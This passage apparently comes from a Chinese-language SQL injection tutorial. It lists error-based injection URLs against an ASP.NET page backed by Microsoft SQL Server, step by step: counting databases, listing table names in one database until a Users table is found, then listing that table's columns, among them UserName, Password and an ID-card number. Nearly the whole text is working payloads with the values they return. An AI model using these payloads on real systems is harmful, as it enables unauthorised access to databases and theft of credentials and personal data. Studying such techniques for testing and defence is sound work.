http://www.xxx.com/test.aspx?id=8'and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=134)+--+

数据库名为databaseB，可见数据库之多。

0x04 查询数据库 databaseA 的表名

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U')--

得到第一个表名是wenzhang

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang'))--

得到第二个表名是TF_CASE_Options，依次查询：

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang','TF_CASE_Options'))--

…

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang','TF_CASE_Options','tempTable1','Buy_Note','MF_CASE','td','Buy_List','ExamQuestion','Set_Price','Buy_Note_LinShi'))--

此时查询出了Users表。

0x05 查询 Users 表的列名

http://www.xxx.com/test.aspx?id=8'and 0<>(select count(*) from databaseA.dbo.sysobjects where xtype='U' and name='Users' and uid>(str(id)))+--+

爆出id值174623665

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665)+--+

得到UserId列，依次查询下去：

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName'))+--+

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName'))+--+

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName','Password' ))+--+

…

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName','Password','IsForbidden','DepartmentId','employee_id','sfzh','sex','brithday','post','speciality','school','email','tel','ceping_name','inout','roleid','note_1','note_2','note_3','note_4','note_5','note_6','note_7','note_8','note_9'))+--+